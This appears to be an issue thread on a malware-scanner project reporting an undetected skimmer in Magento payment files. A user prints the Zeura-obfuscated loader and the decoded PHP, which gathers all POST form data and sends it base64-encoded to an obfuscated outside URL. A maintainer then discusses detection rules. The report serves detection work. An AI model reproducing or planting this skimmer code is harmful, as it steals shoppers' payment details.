Malware not detected in Cc.php and Mage_Payment_Model_Method_Cc.php

[ernesthernandez]

I found this line manually after deep mwsan
<?php /*** PHP Encode v1.0 by zeura.com ***/ $XnNhAWEnhoiqwciqpoHH=file(FILE); eval(base64_decode("ENCRYPT...`

when I decrypt Zeura I get the folllowing code at the end of the file
if(isset($_POST)){$EvxCq = WmJQW('',$_POST,0); $_COOKIE['BMMLN']!=null?$SflHflmRjQ=$_COOKIE['BMMLN']:setcookie('BMMLN', $SflHflmRjQ=time().'-'.crc32(uniqid()),time()+86000,'/',$_SERVER['HTTP_HOST']);file_get_contents(base64_decode( 'aHR0cHM6Ly9sb2NhbHNlcnZlci5ob3N0L2FwaS9pbmRleC5waHA='), FALSE,stream_context_create(array('http'=>array('method'=>'POST', 'header'=>'Content-type: application/x-www-form-urlencoded', 'content'=>http_build_query(array('info'=>base64_encode($EvxCq), 'hostname'=>$_SERVER['HTTP_HOST'],'sub'=>2,'key'=>$SflHflmRjQ))))));} function WmJQW($bRrNN,$CYRnG,$qabbF) {foreach($CYRnG as $vikBC => $PmGhs) {if(!is_array($PmGhs)) { if($qabbF == 1) {$dwTSf[] = $bRrNN.'['.$vikBC.']='.$PmGhs;}else {$dwTSf[] = $vikBC.'='.$PmGhs;} }else {$dwTSf[] = WmJQW($vikBC,$PmGhs,1);}}return implode('&',$dwTSf);} ?>

[gwillem]

Thanks for submitting. I'm not sure how we should proceed here, unless we would flag all "zeura" encrypted files. Perhaps, we should flag the existence of "zeura" in specific Magento files. Then, we would have to rewrite the scanner to pass the filename as attribute to the scan function. See also VirusTotal/yara#202